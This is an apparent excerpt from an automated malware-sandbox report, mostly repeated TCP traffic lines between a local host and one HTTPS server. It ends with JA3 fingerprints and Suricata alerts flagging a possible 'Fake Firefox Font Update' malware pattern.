Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49705
Source: global trafficTCP traffic: 192.168.2.10:49706 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49706
Source: global trafficTCP traffic: 192.168.2.10:49706 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49706 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49706
Source: global trafficTCP traffic: 192.168.2.10:49707 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49707
Source: global trafficTCP traffic: 192.168.2.10:49707 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49707 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49707
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49706
Source: global trafficTCP traffic: 192.168.2.10:49706 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49706
Source: global trafficTCP traffic: 192.168.2.10:49706 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49706
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49707
Source: global trafficTCP traffic: 192.168.2.10:49707 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49707
Source: global trafficTCP traffic: 192.168.2.10:49707 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49707
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49706
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49706
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49706
Source: global trafficTCP traffic: 192.168.2.10:49706 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49706 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49706
Source: global trafficTCP traffic: 192.168.2.10:49706 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49706
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49707
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49707
Source: global trafficTCP traffic: 192.168.2.10:49707 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.10:49707 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49707
Source: global trafficTCP traffic: 192.168.2.10:49707 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.10:49707
Source: Joe Sandbox ViewIP Address: 3.39.89.152 3.39.89.152
Source: Joe Sandbox ViewIP Address: 13.107.246.67 13.107.246.67
Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49705 -> 13.107.246.67:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49707 -> 13.107.246.67:443
